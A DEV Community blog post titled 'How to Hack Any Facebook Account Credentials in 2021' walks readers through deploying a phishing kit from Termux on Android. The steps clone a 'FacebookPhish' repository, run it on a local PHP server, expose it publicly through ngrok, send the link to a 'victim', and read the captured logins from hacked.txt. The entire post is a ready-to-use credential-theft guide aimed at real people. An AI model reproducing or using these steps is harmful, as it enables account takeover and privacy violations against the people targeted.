DEV Community

Harshit Singh
Harshit Singh

Posted on • Updated on

How to Hack Any Facebook Account Credentials in 2021

Hello Everyone
Today I am going to show you how you can hack any Facebook Account Credentials in Termux (Android)
So lets get started

Firstly install termux from Playstore

Then upgrade packages

apt update && apt upgrade -y
Enter fullscreen mode Exit fullscreen mode

Then install Git

pkg install git -y
Enter fullscreen mode Exit fullscreen mode

Then clone this repo

git clone https://github.com/ProHarshit/FacebookPhish
Enter fullscreen mode Exit fullscreen mode

Then navigate to it

cd FacebookPhish
Enter fullscreen mode Exit fullscreen mode

Then install php

pkg install php -y
Enter fullscreen mode Exit fullscreen mode

Then start PHP Server

php -S localhost:8080
Enter fullscreen mode Exit fullscreen mode

Then open another session and run this command

chmod 777 FacebookPhish/ngrok
Enter fullscreen mode Exit fullscreen mode

Then turn on hotspot and run ngrok

./ngrok http 8080
Enter fullscreen mode Exit fullscreen mode

Then copy the web forwarding url and give it to the victim.Ask him/her to login.

Now open another session and run this command

cd FacebookPhish && cat hacked.txt
Enter fullscreen mode Exit fullscreen mode

Run this command again and again until you get credentials

Thank you
'Follower Goal 50'
Pls tell how did you like it

Top comments (0)